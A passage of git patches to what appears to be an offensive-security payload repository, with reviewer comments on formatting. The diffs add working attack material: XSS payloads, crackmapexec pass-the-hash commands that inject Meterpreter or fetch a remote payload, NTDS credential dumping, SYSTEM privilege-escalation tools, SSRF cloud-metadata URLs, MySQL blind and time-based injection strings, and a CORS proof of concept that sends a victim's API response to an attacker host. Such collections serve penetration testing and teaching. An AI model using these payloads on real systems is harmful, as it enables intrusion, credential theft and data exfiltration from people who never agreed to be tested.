@@ -51,7 +62,7 @@ When you are logged in to a certain site, you typically have a session. The iden ``` -### JSON GET – Simple Request +### JSON GET - Simple Request ```html ``` -### JSON POST – Simple Request +### JSON POST - Simple Request ```html ``` -### JSON POST – Complex Request +### JSON POST - Complex Request ```html ]]> ``` -XSS in Markdown +### XSS in Markdown ```csharp [a](javascript:prompt(document.cookie)) @@ -306,7 +307,7 @@ XSS in Markdown [a](javascript:window.onerror=alert;throw%201) ``` -XSS in SWF flash application +### XSS in SWF flash application ```powershell Browsers other than IE: http://0me.me/demo/xss/xssproject.swf?js=alert(document.domain); @@ -316,7 +317,7 @@ IE9: http://0me.me/demo/xss/xssproject.swf?js=w=window.open(‘invalidfileinvali more payloads in ./files -XSS in SWF flash application +### XSS in SWF flash application ``` flashmediaelement.swf?jsinitfunctio%gn=alert`1` @@ -337,7 +338,7 @@ flashcanvas.swf?id=test\"));}catch(e){alert(document.domain)}// phpmyadmin/js/canvg/flashcanvas.swf?id=test\”));}catch(e){alert(document.domain)}// ``` -XSS in CSS +### XSS in CSS ```html @@ -356,6 +357,33 @@ div { ``` +## XSS in PostMessage + +> If the target origin is asterisk * the message can be sent to any domain has reference to the child page. + +```html + + + + + + + +``` + ## Blind XSS ### XSS Hunter 
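Review bot: After this hunk the file has two consecutive `### XSS in SWF flash application` headings, one for the `0me.me/demo/xss/xssproject.swf` payloads and one for the `flashmediaelement.swf` / `flashcanvas.swf` list, which yields duplicate anchors; rename the second (for example to cover known vulnerable SWF files) or merge the two. The second block also keeps an untagged fence while the first is tagged `powershell`, and `more payloads in ./files` should be a link.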
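Review bot: In the new `## XSS in PostMessage` section, `the message can be sent to any domain has reference to the child page` should read `any domain that has a reference to the child page`. The blockquote states the risk but not the fix; one line saying that the sender should pass a concrete target origin instead of `*` and that the receiving `message` listener must check the event's origin before using the data would make the section useful for remediation as well.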
@@ -1002,6 +1030,7 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [How I found a $5,000 Google Maps XSS (by fiddling with Protobuf)](https://medium.com/@marin_m/how-i-found-a-5-000-google-maps-xss-by-fiddling-with-protobuf-963ee0d9caff#.cktt61q9g) by Marin MoulinierFollow - [Airbnb – When Bypassing JSON Encoding, XSS Filter, WAF, CSP, and Auditor turns into Eight Vulnerabilities](https://buer.haus/2017/03/08/airbnb-when-bypassing-json-encoding-xss-filter-waf-csp-and-auditor-turns-into-eight-vulnerabilities/) by Brett - [XSSI, Client Side Brute Force](http://blog.intothesymmetry.com/2017/05/cross-origin-brute-forcing-of-saml-and.html) +- [postMessage XSS on a million sites - December 15, 2016 - Mathias Karlsson](https://labs.detectify.com/2016/12/15/postmessage-xss-on-a-million-sites/) - [postMessage XSS Bypass](https://hackerone.com/reports/231053) - [XSS in Uber via Cookie](http://zhchbin.github.io/2017/08/30/Uber-XSS-via-Cookie/) by zhchbin - [Stealing contact form data on www.hackerone.com using Marketo Forms XSS with postMessage frame-jumping and jQuery-JSONP](https://hackerone.com/reports/207042) by frans @@ -1014,4 +1043,4 @@ anythinglr00%3c%2fscript%3e%3cscript%3ealert(document.domain)%3c%2fscript%3euxld - [App Maker and Colaboratory: two Google stored XSSes](https://ysx.me.uk/app-maker-and-colaboratory-a-stored-google-xss-double-bill/) - [XSS in www.yahoo.com](https://www.youtube.com/watch?v=d9UEVv3cJ0Q&feature=youtu.be) - [Stored XSS, and SSRF in Google using the Dataset Publishing Language](https://s1gnalcha0s.github.io/dspl/2018/03/07/Stored-XSS-and-SSRF-Google.html) -- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) +- [Stored XSS on Snapchat](https://medium.com/@mrityunjoy/stored-xss-on-snapchat-5d704131d8fd) \ No newline at end of file From 66c9d945b74ea07ae4419e8743e30156f148c067 Mon Sep 17 00:00:00 2001 
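Review bot: The final hunk replaces the `- [Stored XSS on Snapchat](...)` line with the identical line minus its terminating newline (`\ No newline at end of file`), which is a regression in an otherwise reference-only change; keep the trailing newline. The same pattern appears in the `AWS Amazon Bucket S3/README.md` hunk of this patch.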
From: Alexandre ZANNI <16578570+noraj@users.noreply.github.com> Date: Tue, 6 Aug 2019 17:28:47 +0200 Subject: [PATCH 039/222] Update README.md --- XXE Injection/README.md | 7 ++++++- 1 file changed, 6 insertions(+), 1 deletion(-) diff --git a/XXE Injection/README.md b/XXE Injection/README.md index f94edd00..f3a3fafe 100644 --- a/XXE Injection/README.md +++ b/XXE Injection/README.md @@ -32,6 +32,11 @@ Syntax: `` ``` sudo ./xxeftp -uno 443 ./xxeftp -w -wps 5555 ``` + - [230-OOB](https://github.com/lc/230-OOB) and payload generation via [http://xxe.sh/](http://xxe.sh/) + ``` + $ python3 230.py 2121 + ``` + ## Detect the vulnerability @@ -306,4 +311,4 @@ GIF (experimental) * [XXE in Uber to read local files](https://httpsonly.blogspot.hk/2017/01/0day-writeup-xxe-in-ubercom.html) * [XXE by SVG in community.lithium.com](http://esoln.net/Research/2017/03/30/xxe-in-lithium-community-platform/) * [XXE inside SVG](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) -* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) \ No newline at end of file +* [Pentest XXE - @phonexicum](https://phonexicum.github.io/infosec/xxe.html) From b6697d859570803e55cff6a68d4d6827b2126788 Mon Sep 17 00:00:00 2001 
From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Thu, 15 Aug 2019 18:21:06 +0200 Subject: [PATCH 040/222] SSRF SVG + Windows Token getsystem --- .../Active Directory Attack.md | 8 +++++--- .../Windows - Privilege Escalation.md | 11 +++++++++++ .../Files/ssrf_svg_css_import.svg | 7 +++++++ .../Files/ssrf_svg_css_link.svg | 6 ++++++ .../Files/ssrf_svg_css_xmlstylesheet.svg | 6 ++++++ .../Files/ssrf_svg_image.svg | 4 ++++ .../Files/ssrf_svg_use.svg | 4 ++++ Server Side Request Forgery/README.md | 15 ++++++++++++++- 8 files changed, 57 insertions(+), 4 deletions(-) create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_import.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_link.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_image.svg create mode 100644 Server Side Request Forgery/Files/ssrf_svg_use.svg diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 6dae309e..7a1cfc63 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -55,6 +55,7 @@ crackmapexec smb -M name_module -o VAR=DATA crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --local-auth crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f --shares + crackmapexec 192.168.1.100 -u Jaddmon -H ':5858d47a41e40b40f294b3100bea611f' -d 'DOMAIN' -M invoke_sessiongopher crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M rdp -o ACTION=enable crackmapexec 192.168.1.100 -u Jaddmon -H 5858d47a41e40b40f294b3100bea611f -M metinject -o LHOST=192.168.1.63 LPORT=4443 crackmapexec 192.168.1.100 -u Jaddmon -H ":5858d47a41e40b40f294b3100bea611f" -M web_delivery -o URL="https://IP:PORT/posh-payload" 
@@ -170,13 +171,13 @@ mimikatz.exe "kerberos::ptc c:\temp\TGT_darthsidious@lab.adsecurity.org.ccache" :warning: If the clock is skewed use `clock-skew.nse` script from `nmap` ```powershell -$ nmap -sV -sC 10.10.10.10 +Linux> $ nmap -sV -sC 10.10.10.10 clock-skew: mean: -1998d09h03m04s, deviation: 4h00m00s, median: -1998d11h03m05s -$ sudo date -s "14 APR 2015 18:25:16" +Linux> sudo date -s "14 APR 2015 18:25:16" +Windows> net time /domain /set ``` - ### Open Shares ```powershell @@ -230,6 +231,7 @@ Mount a share ```powershell smbmount //X.X.X.X/c$ /mnt/remote/ -o username=user,password=pass,rw +sudo mount -t cifs -o username=,password= ///Users folder ``` ### GPO - Pivoting with Local Admin & Passwords in SYSVOL diff --git a/Methodology and Resources/Windows - Privilege Escalation.md b/Methodology and Resources/Windows - Privilege Escalation.md index 357f3c18..12f24dca 100644 --- a/Methodology and Resources/Windows - Privilege Escalation.md +++ b/Methodology and Resources/Windows - Privilege Escalation.md @@ -18,6 +18,7 @@ * [EoP - From local administrator to NT SYSTEM](#eop---from-local-administrator-to-nt-system) * [EoP - Living Off The Land Binaries and Scripts](#eop---living-off-the-land-binaries-and-scripts) * [EoP - Impersonation Privileges](#eop---impersonation-privileges) + * [Meterpreter getsystem and alternatives](#meterpreter-getsystem-and-alternatives) * [RottenPotato (Token Impersonation)](#rottenpotato-token-impersonation) * [Juicy Potato (abusing the golden privileges)](#juicy-potato-abusing-the-golden-privileges) * [EoP - Common Vulnerabilities and Exposures](#eop---common-vulnerabilities-and-exposure) 
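Review bot: The new prompt labels are inconsistent: `Linux> $ nmap -sV -sC 10.10.10.10` keeps a `$` that `Linux> sudo date -s "14 APR 2015 18:25:16"` and `Windows> net time /domain /set` drop. Use one form. Since the `clock-skew` output comes from the target, say explicitly that `date -s` and `net time /domain /set` adjust the operator's own host to match the domain controller, which is what the `:warning:` sentence implies.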
@@ -662,6 +663,16 @@ Microsoft.Workflow.Compiler.exe tests.xml results.xml ## EoP - Impersonation Privileges +### Meterpreter getsystem and alternatives + +```powershell +meterpreter> getsystem +Tokenvator.exe getsystem cmd.exe +incognito.exe execute -c "NT AUTHORITY\SYSTEM" cmd.exe +psexec -s -i cmd.exe +python getsystem.py # from https://github.com/sailay1996/tokenx_privEsc +``` + ### RottenPotato (Token Impersonation) Binary available at : https://github.com/foxglovesec/RottenPotato diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_import.svg b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg new file mode 100644 index 00000000..8c1f4466 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_import.svg @@ -0,0 +1,7 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_link.svg b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg new file mode 100644 index 00000000..e9f7d305 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_link.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg new file mode 100644 index 00000000..a29199af --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_css_xmlstylesheet.svg @@ -0,0 +1,6 @@ + + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_image.svg b/Server Side Request Forgery/Files/ssrf_svg_image.svg new file mode 100644 index 00000000..9d3b717e --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_image.svg @@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/Files/ssrf_svg_use.svg b/Server Side Request Forgery/Files/ssrf_svg_use.svg new file mode 100644 index 00000000..14040b20 --- /dev/null +++ b/Server Side Request Forgery/Files/ssrf_svg_use.svg 
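Review bot: The new `### Meterpreter getsystem and alternatives` block mixes a `meterpreter> getsystem` prompt line with four standalone tools (`Tokenvator.exe`, `incognito.exe`, `psexec -s -i cmd.exe`, `getsystem.py`) in one `powershell` fence; a one-line comment per entry, as already done for `getsystem.py`, should state which ones depend on an impersonation privilege, since that is the section heading and is what a defender would look for in the token privileges of the account. The five added `ssrf_svg_*.svg` files all end without a trailing newline (`\ No newline at end of file`).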
@@ -0,0 +1,4 @@ + + + \ No newline at end of file diff --git a/Server Side Request Forgery/README.md b/Server Side Request Forgery/README.md index 9a7032a7..1f0368a3 100644 --- a/Server Side Request Forgery/README.md +++ b/Server Side Request Forgery/README.md @@ -32,6 +32,7 @@ * [SSRF URL for Cloud Instances](#ssrf-url-for-cloud-instances) * [SSRF URL for AWS Bucket](#ssrf-url-for-aws-bucket) * [SSRF URL for AWS Elastic Beanstalk](#ssrf-url-for-aws-elastic-beanstalk) + * [SSRF URL for AWS Lambda](#ssrf-url-for-aws-lambda) * [SSRF URL for Google Cloud](#ssrf-url-for-google-cloud) * [SSRF URL for Digital Ocean](#ssrf-url-for-digital-ocean) * [SSRF URL for Packetcloud](#ssrf-url-for-packetcloud) @@ -441,6 +442,17 @@ http://169.254.169.254/latest/meta-data/iam/security-credentials/aws-elasticbean Then we use the credentials with `aws s3 ls s3://elasticbeanstalk-us-east-2-[ACCOUNT_ID]/`. +### SSRF URL for AWS Lambda + +AWS Lambda provides an HTTP API for custom runtimes to receive invocation events from Lambda and send response data back within the Lambda execution environment. + +```powershell +http://localhost:9001/2018-06-01/runtime/invocation/next +$ curl "http://${AWS_LAMBDA_RUNTIME_API}/2018-06-01/runtime/invocation/next" +``` + +Docs: https://docs.aws.amazon.com/lambda/latest/dg/runtimes-api.html#runtimes-api-next + ### SSRF URL for Google Cloud Requires the header "Metadata-Flavor: Google" or "X-Google-Metadata-Request: True" 
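Review bot: `### SSRF URL for AWS Lambda` lists `http://localhost:9001/2018-06-01/runtime/invocation/next`, but the accompanying sentence says the runtime API serves invocation events `within the Lambda execution environment`; the section should state that this endpoint is only reachable from an SSRF inside a Lambda function (hence the `${AWS_LAMBDA_RUNTIME_API}` variable in the `curl` line), unlike the `169.254.169.254` metadata URLs above it, and that what it returns is the next invocation payload rather than credentials. The block mixes a bare URL and a `$ curl` command in a `powershell` fence; separate them.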
@@ -631,4 +643,5 @@ More info: https://rancher.com/docs/rancher/v1.6/en/rancher-services/metadata-se - [SSRF Protocol Smuggling in Plaintext Credential Handlers : LDAP - @0xrst](https://www.silentrobots.com/blog/2019/02/06/ssrf-protocol-smuggling-in-plaintext-credential-handlers-ldap/) - [X-CTF Finals 2016 - John Slick (Web 25) - YEO QUAN YANG @quanyang](https://quanyang.github.io/x-ctf-finals-2016-john-slick-web-25/) - [Exploiting SSRF in AWS Elastic Beanstalk - February 1, 2019 - @notsosecure](https://www.notsosecure.com/exploiting-ssrf-in-aws-elastic-beanstalk/) -- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) \ No newline at end of file +- [PortSwigger - Web Security Academy Server-side request forgery (SSRF)](https://portswigger.net/web-security/ssrf) +- [SVG SSRF Cheatsheet - Allan Wirth (@allanlw) - 12/06/2019](https://github.com/allanlw/svg-cheatsheet) \ No newline at end of file From 4a176615feea0fa485775cb84ce137a07efdba72 Mon Sep 17 00:00:00 2001 From: Swissky <12152583+swisskyrepo@users.noreply.github.com> Date: Sun, 18 Aug 2019 12:08:51 +0200 Subject: [PATCH 041/222] CORS Misconfiguration --- AWS Amazon Bucket S3/README.md | 3 +- CORS Misconfiguration/README.md | 90 ++ .../Active Directory Attack.md | 1 + SQL Injection/MySQL Injection.md | 50 +- Web Sockets/README.md | 2 - XSS Injection/Files/XML_XSS_cheatsheet.html | 1307 ----------------- XSS Injection/Files/xss.url.url | 3 + 7 files changed, 136 insertions(+), 1320 deletions(-) create mode 100644 CORS Misconfiguration/README.md delete mode 100644 XSS Injection/Files/XML_XSS_cheatsheet.html create mode 100644 XSS Injection/Files/xss.url.url diff --git a/AWS Amazon Bucket S3/README.md b/AWS Amazon Bucket S3/README.md index 7d99d780..98042560 100644 --- a/AWS Amazon Bucket S3/README.md +++ b/AWS Amazon Bucket S3/README.md 
@@ -219,4 +219,5 @@ pip install -r requirements.txt * [flaws2.cloud Challenge based on AWS vulnerabilities - by Scott Piper of Summit Route](http://flaws2.cloud) * [Guardzilla video camera hardcoded AWS credential - 0dayallday.org](https://www.0dayallday.org/guardzilla-video-camera-hard-coded-aws-credentials/) * [AWS PENETRATION TESTING PART 1. S3 BUCKETS - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-1-s3-buckets/) -* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) \ No newline at end of file +* [AWS PENETRATION TESTING PART 2. S3, IAM, EC2 - VirtueSecurity](https://www.virtuesecurity.com/aws-penetration-testing-part-2-s3-iam-ec2/) +* [A Technical Analysis of the Capital One Hack - CloudSploit - Aug 2 2019](https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea?gi=8bb65b77c2cf) \ No newline at end of file diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md new file mode 100644 index 00000000..dcf5bfc2 --- /dev/null +++ b/CORS Misconfiguration/README.md 
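Review bot: the new reference URL carries a Medium tracking parameter, `?gi=8bb65b77c2cf`, which none of the other entries in this list have; drop the query string and keep `https://blog.cloudsploit.com/a-technical-analysis-of-the-capital-one-hack-a9b43d7c8aea`, since the post id is already in the path.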
@@ -0,0 +1,90 @@ +# CORS Misconfiguration + +> A site-wide CORS misconfiguration was in place for an API domain. This allowed an attacker to make cross origin requests on behalf of the user as the application did not whitelist the Origin header and had Access-Control-Allow-Credentials: true meaning we could make requests from our attacker’s site using the victim’s credentials. + +## Summary + +* [Prerequisites](#prerequisites) +* [Exploitation](#exploitation) +* [References](#references) + +## Prerequisites + +* BURP HEADER> `Origin: https://evil.com` +* VICTIM HEADER> `Access-Control-Allow-Credential: true` +* VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` + +## Exploitation + +Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target **https://victim.example.com/endpoint**. + +### Vulnerable example + +```powershell +GET /endpoint HTTP/1.1 +Host: victim.example.com +Origin: https://evil.com +Cookie: sessionid=... + +HTTP/1.1 200 OK +Access-Control-Allow-Origin: https://evil.com +Access-Control-Allow-Credentials: true + +{"[private API key]"} +``` + +### Proof of concept + +```js +var req = new XMLHttpRequest(); +req.onload = reqListener; +req.open('get','https://victim.example.com/endpoint',true); +req.withCredentials = true; +req.send(); + +function reqListener() { + location='//atttacker.net/log?key='+this.responseText; +}; +``` + +or + +```html + + +

CORS PoC

+
+ +
+ + + +``` + +## Bug Bounty reports + +* [CORS Misconfiguration on www.zomato.com - James Kettle (albinowax)](https://hackerone.com/reports/168574) +* [CORS misconfig | Account Takeover - niche.co - Rohan (nahoragg)](https://hackerone.com/reports/426147) +* [Cross-origin resource sharing misconfig | steal user information - bughunterboy (bughunterboy)](https://hackerone.com/reports/235200) +* [CORS Misconfiguration leading to Private Information Disclosure - sandh0t (sandh0t)](https://hackerone.com/reports/430249) +* [[██████] Cross-origin resource sharing misconfiguration (CORS) - Vadim (jarvis7)](https://hackerone.com/reports/470298) + +## References + +* [Think Outside the Scope: Advanced CORS Exploitation Techniques - @Sandh0t - May 14 2019](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397) +* [Exploiting CORS misconfigurations for Bitcoins and bounties - James Kettle | 14 October 2016](https://portswigger.net/blog/exploiting-cors-misconfigurations-for-bitcoins-and-bounties) +* [Exploiting Misconfigured CORS (Cross Origin Resource Sharing) - Geekboy - DECEMBER 16, 2016](https://www.geekboy.ninja/blog/exploiting-misconfigured-cors-cross-origin-resource-sharing/) +* [Advanced CORS Exploitation Techniques - Corben Leo - June 16, 2018](https://www.corben.io/advanced-cors-techniques/) \ No newline at end of file diff --git a/Methodology and Resources/Active Directory Attack.md b/Methodology and Resources/Active Directory Attack.md index 7a1cfc63..91056a72 100644 --- a/Methodology and Resources/Active Directory Attack.md +++ b/Methodology and Resources/Active Directory Attack.md @@ -375,6 +375,7 @@ CrackMapExec module ```powershell cme smb 10.10.0.202 -u username -p password --ntds vss +cme smb 10.10.0.202 -u username -p password --ntds drsuapi #default ``` ### Password in AD User comment diff --git a/SQL Injection/MySQL Injection.md b/SQL Injection/MySQL Injection.md index 22c3b538..b7be9050 100644 
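Review bot: in the new CORS README, the Prerequisites list names the response header `Access-Control-Allow-Credential: true`, but the header is `Access-Control-Allow-Credentials` (plural), as the Vulnerable example further down spells it; fix the list entry so a reader grepping responses for the prerequisite does not miss it. Smaller points in the same file: the Summary lists Prerequisites, Exploitation and References but omits the `## Bug Bounty reports` section the file defines; the HTTP request/response under Vulnerable example is fenced as `powershell` and should be `http`; and in the Proof of concept script the host `//atttacker.net` has three t's, so the PoC as written would post to a different domain than the one intended.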
--- a/SQL Injection/MySQL Injection.md +++ b/SQL Injection/MySQL Injection.md @@ -18,6 +18,8 @@ * [MYSQL Blind with MAKE_SET](#mysql-blind-with-make-set) * [MYSQL Blind with LIKE](#mysql-blind-with-like) * [MYSQL Time Based](#mysql-time-based) + * [Using SLEEP in a subselect](#using-asleep-in-a-subselect) + * [Using conditional statements](#using-conditional-statements) * [MYSQL DIOS - Dump in One Shot](#mysql-dios---dump-in-one-shot) * [MYSQL Current queries](#mysql-current-queries) * [MYSQL Read content of a file](#mysql-read-content-of-a-file) 
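Review bot: the new table-of-contents anchor `#using-asleep-in-a-subselect` will not resolve; the heading added later in this patch is `### Using SLEEP in a subselect`, whose generated anchor is `#using-sleep-in-a-subselect`. Change the link to that.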
@@ -148,11 +150,11 @@ Shorter to read: Works with `MySQL >= 5.1` ```sql -AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- -AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(CHAR(126),version(),CHAR(126)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),schema_name,CHAR(126)) FROM information_schema.schemata LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),TABLE_NAME,CHAR(126)) FROM information_schema.TABLES WHERE table_schema=data_column LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),column_name,CHAR(126)) FROM information_schema.columns WHERE TABLE_NAME=data_table LIMIT data_offset,1)))-- +?id=1 AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126)) FROM data_table.data_column LIMIT data_offset,1)))-- ``` ## MYSQL Blind @@ -165,6 +167,8 @@ AND extractvalue(rand(),concat(0x3a,(SELECT concat(CHAR(126),data_info,CHAR(126) ?id=1 and left(version(),1)=4 ?id=1 and ascii(lower(substr(Version(),1,1)))=51 ?id=1 and (select mid(version(),1,1)=4) +?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A' +?id=1 AND SELECT SUBSTR(column_name,1,1) FROM information_schema.columns > 'A' ``` ### MYSQL Blind using a conditional statement 
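Review bot: the two new lines in the MYSQL Blind block, `?id=1 AND SELECT SUBSTR(table_name,1,1) FROM information_schema.tables > 'A'` and its `column_name` twin, are not valid SQL: a SELECT used as an operand must be parenthesised, and comparing it with `> 'A'` needs a single-row result, so a `LIMIT 0,1` is required, exactly as the existing `(select mid(version(),1,1)=4)` line and the `limit 0,1` subselect in the time-based section below do it. As written they will only produce a syntax error.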
@@ -204,17 +208,42 @@ SELECT cust_code FROM customer WHERE cust_name LIKE 'k__l'; ## MYSQL Time Based +The following SQL codes will delay the output from MySQL. + ```sql +BENCHMARK(40000000,SHA1(1337))+ '%2Bbenchmark(3200,SHA1(1))%2B' -' OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 - AND [RANDNUM]=BENCHMARK([SLEEPTIME]000000,MD5('[RANDSTR]')) //SHA1 RLIKE SLEEP([SLEEPTIME]) OR ELT([RANDNUM]=[RANDNUM],SLEEP([SLEEPTIME])) +``` -?id=1 and IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) -- -?id=1 and IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- +### Using SLEEP in a subselect + +```powershell +1 and (select sleep(10) from dual where database() like '%')# +1 and (select sleep(10) from dual where database() like '___')# +1 and (select sleep(10) from dual where database() like '____')# +1 and (select sleep(10) from dual where database() like '_____')# +1 and (select sleep(10) from dual where database() like 'a____')# +... +1 and (select sleep(10) from dual where database() like 's____')# +1 and (select sleep(10) from dual where database() like 'sa___')# +... +1 and (select sleep(10) from dual where database() like 'sw___')# +1 and (select sleep(10) from dual where database() like 'swa__')# +1 and (select sleep(10) from dual where database() like 'swb__')# +1 and (select sleep(10) from dual where database() like 'swi__')# +... +1 and (select sleep(10) from dual where (select table_name from information_schema.columns where table_schema=database() and column_name like '%pass%' limit 0,1) like '%')# +``` + +### Using conditional statements + +```sql +?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()),1,1)))>=100,1, BENCHMARK(2000000,MD5(NOW()))) -- +?id=1 AND IF(ASCII(SUBSTRING((SELECT USER()), 1, 1)))>=100, 1, SLEEP(3)) -- +?id=1 OR IF(MID(@@version,1,1)='5',sleep(1),1)='2 ``` ## MYSQL DIOS - Dump in One Shot 
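Review bot: the new "Using SLEEP in a subselect" block is fenced as `powershell` although every line in it is SQL; use `sql`, matching the fence on "Using conditional statements" right after it. The new intro sentence "The following SQL codes will delay the output from MySQL." reads awkwardly; "The following SQL snippets delay the MySQL response." says the same thing. The `...` lines inside the subselect block are clearly elisions between iterations of the `LIKE` search, but a one-line comment saying so would make that explicit for readers who copy the block whole.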
@@ -324,4 +353,5 @@ load data infile '\\\\error\\abc' into table database.table_name; - [SQL Truncation Attack - Warlock](https://resources.infosecinstitute.com/sql-truncation-attack/) - [HackerOne @ajxchapman 50m-ctf writeup - Alex Chapman @ajxchapman](https://hackerone.com/reports/508123) - [SQL Wiki - netspi](https://sqlwiki.netspi.com/injectionTypes/errorBased) -- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) \ No newline at end of file +- [ekoparty web_100 - 2016/10/26 - p4-team](https://github.com/p4-team/ctf/tree/master/2016-10-26-ekoparty/web_100) +- [Websec - MySQL - Roberto Salgado - May 29, 2013.](https://websec.ca/kb/sql_injection#MySQL_Default_Databases) \ No newline at end of file diff --git a/Web Sockets/README.md b/Web Sockets/README.md index 12f1e015..be396b89 100644 --- a/Web Sockets/README.md +++ b/Web Sockets/README.md @@ -2,8 +2,6 @@ > The WebSocket protocol allows a bidirectional and full-duplex communication between a client and a server - - ## Summary * [Tools](#tools) diff --git a/XSS Injection/Files/XML_XSS_cheatsheet.html b/XSS Injection/Files/XML_XSS_cheatsheet.html deleted file mode 100644 index df741b6d..00000000 --- a/XSS Injection/Files/XML_XSS_cheatsheet.html +++ /dev/null 
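Review bot: the commit subject is "CORS Misconfiguration", but this patch also deletes the 1307-line `XSS Injection/Files/XML_XSS_cheatsheet.html`, adds `XSS Injection/Files/xss.url.url`, removes two blank lines from `Web Sockets/README.md` and extends the MySQL and S3 reference lists, none of which the message mentions; either split the unrelated changes into their own commits or list them in the message so the deletion of the XSS cheatsheet is not invisible in history. Minor: the new MySQL reference ends with a trailing period ("May 29, 2013.") while the other entries in that list do not.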
@@ -1,1307 +0,0 @@ - - - - XSS Locator - ';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{} - - Inject this string, and in most cases where a script is vulnerable with no special XSS vector requirements the word "XSS" will pop up. You'll need to replace the "&" with "%26" if you are submitting this XSS string via HTTP GET or it will be ignored and everything after it will be interpreted as another variable. Tip: If you're in a rush and need to quickly check a page, often times injecting the deprecated "<PLAINTEXT>" tag will be enough to check to see if something is vulnerable to XSS by messing up the output appreciably. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - XSS Quick Test - '';!--"<XSS>=&{()} - If you don't have much space, this string is a nice compact XSS injection check. View source after injecting it and look for <XSS versus &lt;XSS to see if it is vulnerable. - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Alert() - <SCRIPT>alert('XSS')</SCRIPT> - Basic injection attack - - - Browser support: [<span class="s">IE6.0</span>|<span class="s">NS8.1-IE</span>] [<span class="s">NS8.1-G</span>|<span class="s">FF1.5</span>] [<span class="s">O8.54</span>] - - - - SCRIPT w/Source File - <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT> - No filter evasion. This is a normal XSS JavaScript injection, and most likely to get caught but I suggest trying it first (the quotes are not required in any modern browser so they are omitted here). 
